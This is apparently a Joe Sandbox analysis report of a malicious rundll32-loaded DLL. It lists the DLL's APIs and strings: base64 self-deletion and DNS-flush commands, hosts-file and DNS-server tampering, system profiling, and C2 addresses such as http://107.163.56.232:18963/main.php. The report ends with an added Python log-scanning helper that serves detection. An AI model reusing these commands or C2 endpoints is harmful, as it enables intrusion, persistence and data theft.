                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-2405328761
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
• C:\Users\user\Desktop, xrefs: 1000882E
• Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833 (base64; decodes to the ping-delay and directory-removal command line cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s")
Memory Dump Source
• Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-2405328761
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
• C:\Users\user\Desktop, xrefs: 1000882E
• Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
Memory Dump Source
• Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-2405328761
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant
• String ID: $p=Vu
• API String ID: 1927566239-153977967
APIs
• Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FE6
  • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CCD,?,10005CCD,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
Similarity
• API ID: CreateTimer$Concurrency::details::platform::__FileQueue
• String ID: %s\lang.ini$C:\Users\user\Desktop
• API String ID: 3486561800-2493208567

Execution Graph

Execution Coverage: 0.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 28
Total number of Limit Nodes: 0
execution_graph 29716 10001812 29717 10001817 29716->29717 29720 10001000 29717->29720 29719 10001821 29721 100016c0 29720->29721 29724 10021753 29721->29724 29723 10001804 ctype 29723->29719 29725 10021758 29724->29725 29728 1002f839 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29725->29728 29729 100025d2 29730 100025d7 29729->29730 29731 10001000 5 API calls 29730->29731 29732 100025e1 29731->29732 29735 10028391 wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29732->29735 29740 10002523 29741 10002528 29740->29741 29742 10001000 5 API calls 29741->29742 29743 10002532 29742->29743 29746 10024275 29743->29746 29747 10024294 29746->29747 29750 1003b76d 6 API calls 29747->29750 29755 10004468 29756 10004478 29755->29756 29759 100290bf wvsprintfA InternetOpenA InternetOpenUrlA InternetCloseHandle LdrInitializeThunk 29756->29759 29764 100018ee 29765 100018f3 29764->29765 29766 10001000 5 API calls 29765->29766 29767 100018fd 29766->29767

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 189 1000cd1a-1000cd26 call 1002e244 call 1002fcaa
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0cac8ab3a70285047468c69ee232a774f5b83f97ee4095c7ae26fa2f9415f207
                                                                                                                                                                          • Instruction ID: 4eedc2aa77c9d59bcddca50e965c985171f4ab6a32ddcd3d91d86852c72849b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cac8ab3a70285047468c69ee232a774f5b83f97ee4095c7ae26fa2f9415f207
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007370
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 1000739A
                                                                                                                                                                            • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007536
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                                                          • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
                                                                                                                                                                          • API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005449
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000538F
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000539C
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053A5
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053B2
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054B0
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054CE
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(?,?,76078400,?,00000000), ref: 100054F0
                                                                                                                                                                          • rand.MSVCRT ref: 1000553C
                                                                                                                                                                          • rand.MSVCRT ref: 1000554A
                                                                                                                                                                          • rand.MSVCRT ref: 10005555
                                                                                                                                                                          • rand.MSVCRT ref: 10005560
                                                                                                                                                                          • rand.MSVCRT ref: 1000556B
                                                                                                                                                                          • rand.MSVCRT ref: 10005576
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005594
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100055C0
                                                                                                                                                                          Strings
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
                                                                                                                                                                          • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                                                          • API String ID: 3997227624-455112146
                                                                                                                                                                          • Opcode ID: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 10006F47
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FAE
                                                                                                                                                                          • LdrInitializeThunk.NTDLL ref: 10006FC5
                                                                                                                                                                          • Sleep.KERNEL32 ref: 1000707C
                                                                                                                                                                          • wsprintfA.USER32 ref: 100070C0
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: FileInitializePrintSleepThunk$wsprintf
• String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
• API String ID: 983772623-3558339448
• Opcode ID: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
• Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
• Opcode Fuzzy Hash: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
• Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51
APIs
• VariantInit.OLEAUT32(?), ref: 10004ED7
• VariantInit.OLEAUT32(?), ref: 10004EDD
• VariantInit.OLEAUT32(?), ref: 10004EE3
• VariantInit.OLEAUT32(?,?,?,00000000), ref: 10005021
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant
• String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
• API String ID: 1927566239-3240772352
• Opcode ID: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
• Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
• Opcode Fuzzy Hash: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
• Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
APIs
Strings
• XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
• 127.0.0.1, xrefs: 10008417
• http://107.163.56.232:18963/main.php, xrefs: 10008376
• XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
• 8.8.8.8, xrefs: 10008412
• Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk$Sleepwsprintf
• String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
• API String ID: 2795264321-515792873
• Opcode ID: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
• Instruction ID: 8dd24be72779d1db326892d4824c811f5291eb1f4f1f793922e2c79d5d000f77
• Opcode Fuzzy Hash: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
• Instruction Fuzzy Hash: A44109B6D0425976FB21D364CC56FCF7B6CEB44280F2045A5F248BA086DAB4AB844F55
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: wsprintf
• String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$F896SD5DAE$M%s
• API String ID: 2111968516-1696321353
• Opcode ID: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
• Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
• Opcode Fuzzy Hash: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
• Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
APIs
• wsprintfA.USER32 ref: 10006509
  • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
• ___crtGetTimeFormatEx.LIBCMT ref: 10006558
  • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
  • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
• wsprintfA.USER32 ref: 100066FB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                                                          • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                                                          • API String ID: 4077377486-2496724313
                                                                                                                                                                          • Opcode ID: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction ID: 293d0e7632e531392dd0fb5c2f77952c0a17312896667c4884a995f19a9271bc
                                                                                                                                                                          • Opcode Fuzzy Hash: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C81D6B6C04249BEFB01DBA4DC81EEF7B7DEF09394F244166F505A6186DA316E4087B1
APIs
• ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
  • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
  • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseFormatQueryTimeValue___crt
• String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
• API String ID: 271660946-2089455369
• Opcode ID: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
• Instruction ID: c0ffa68043a95791f02fd04d8c4918fc6d3fd57fe225104bb55dd78593dce371
• Opcode Fuzzy Hash: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
• Instruction Fuzzy Hash: CB31C3B680460DBAEB11CB60DC46FDF77ACEF04351F54406AF644AB182EB35BB448B95
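The function above reads ProcessorNameString from HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0, formats the memory size as "%u MB" and carries the C2 URL http://107.163.56.232:18963/main.php, i.e. a host profile sent over plain HTTP on a non-standard port. The following is an added triage helper, not code from the Joe Sandbox report or from the sample: it scans proxy-style HTTP logs for that C2 URL, for HTTP on ports outside the usual set and for IP-literal hosts. The log format and the log lines are constructed for the example; the C2 URL is the one in the report.

```python
"""Flag HTTP requests matching the C2 indicators of this function.

Added example for analysts, not code from the report or the sample.
Fact from the report: C2 URL http://107.163.56.232:18963/main.php.
Assumption: the simplified proxy log format "<ts> <client-ip> <method> <url> <status>".
"""
import ipaddress
import re
from urllib.parse import urlsplit

C2_URL = "http://107.163.56.232:18963/main.php"      # from the report
STANDARD_HTTP_PORTS = {80, 443, 8080, 8443}           # tune to your environment

# Constructed proxy log lines (not real traffic from the analysis)
SAMPLE_LOG = """\
2024-12-20T10:00:01Z 10.0.0.5 GET http://www.example.com/index.html 200
2024-12-20T10:00:07Z 10.0.0.5 POST http://107.163.56.232:18963/main.php 200
2024-12-20T10:00:09Z 10.0.0.8 GET http://intranet.example:8080/status 200
2024-12-20T10:00:12Z 10.0.0.5 GET http://107.163.56.232:18963/main.php?id=1 404
2024-12-20T10:00:20Z 10.0.0.9 GET http://203.0.113.7:4444/ 200
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3})$")
_C2 = urlsplit(C2_URL)


def _is_ip_literal(host):
    """True when the host part is an IPv4/IPv6 literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(url):
    """Return the reasons a URL is suspicious; an empty list means clean."""
    parts = urlsplit(url)
    reasons = []
    # Exact C2 match on host:port and path, so query-string variants still hit
    if parts.netloc == _C2.netloc and parts.path == _C2.path:
        reasons.append("known C2 URL")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if parts.scheme == "http" and port not in STANDARD_HTTP_PORTS:
        reasons.append(f"HTTP on non-standard port {port}")
    if _is_ip_literal(parts.hostname or ""):
        reasons.append("IP literal instead of hostname")
    return reasons


def scan(log_text):
    """Return (client_ip, url, reasons) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip malformed lines instead of aborting
        reasons = classify(m["url"])
        if reasons:
            hits.append((m["src"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for src, url, why in scan(SAMPLE_LOG):
        print(f"{src} -> {url}: {', '.join(why)}")
```

The non-standard-port and IP-literal rules are generic and will fire on benign intranet services too; the exact C2 match is the high-confidence signal, the other two are for hunting around it.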
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmp
